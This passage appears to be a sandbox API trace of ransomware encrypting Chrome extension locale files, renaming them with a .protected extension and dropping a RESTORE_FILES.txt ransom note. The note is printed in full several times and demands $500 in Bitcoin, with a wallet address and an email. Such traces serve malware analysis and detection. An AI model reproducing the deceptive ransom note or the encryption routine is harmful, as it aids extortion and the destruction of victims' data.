(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.177] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.178] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.178] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.178] CloseHandle (hObject=0x164) returned 1 [0080.178] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="Windows") returned -1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="Program Files") returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="Program Files (x86)") returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="$Recycle.bin") returned 1 [0080.178] lstrcmpiW (lpString1="sv", lpString2="System Volume Information") returned -1 [0080.178] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv") returned 141 [0080.178] lstrcmpW (lpString1="sv", lpString2=".") returned 1 [0080.178] lstrcmpW (lpString1="sv", lpString2="..") returned 1 [0080.178] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*") returned 143 [0080.178] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.178] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.178] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.178] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.178] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.178] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.178] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\.") returned 143 [0080.178] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.178] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.178] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.178] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.178] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.178] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.179] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.179] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\..") returned 144 [0080.179] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.179] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.179] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.179] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.179] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.179] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json") returned 155 [0080.179] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.179] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.180] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.180] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0080.180] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.180] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.180] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.181] CloseHandle (hObject=0x168) returned 1 [0080.181] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.protected") returned 165 [0080.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\messages.json.protected")) returned 1 [0080.181] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.181] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.181] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\RESTORE_FILES.txt") returned 159 [0080.181] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.182] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.182] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.182] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.182] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0080.182] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.182] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.182] CloseHandle (hObject=0x164) returned 1 [0080.183] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0080.183] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th") returned 141 [0080.183] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0080.183] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*") returned 143 [0080.183] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.183] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.183] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.183] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\.") returned 143 [0080.183] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.183] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.183] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.183] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.183] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\..") returned 144 [0080.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.183] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.183] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.183] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.183] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.183] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.183] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.184] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.184] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.184] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.184] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.185] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json") returned 155 [0080.185] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.185] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0080.185] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffef6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.185] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x10a, lpOverlapped=0x0) returned 1 [0080.185] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.186] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.186] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.186] CloseHandle (hObject=0x168) returned 1 [0080.186] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.protected") returned 165 [0080.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\messages.json.protected")) returned 1 [0080.186] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.186] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.186] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\RESTORE_FILES.txt") returned 159 [0080.187] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.187] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.187] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.188] lstrlenA 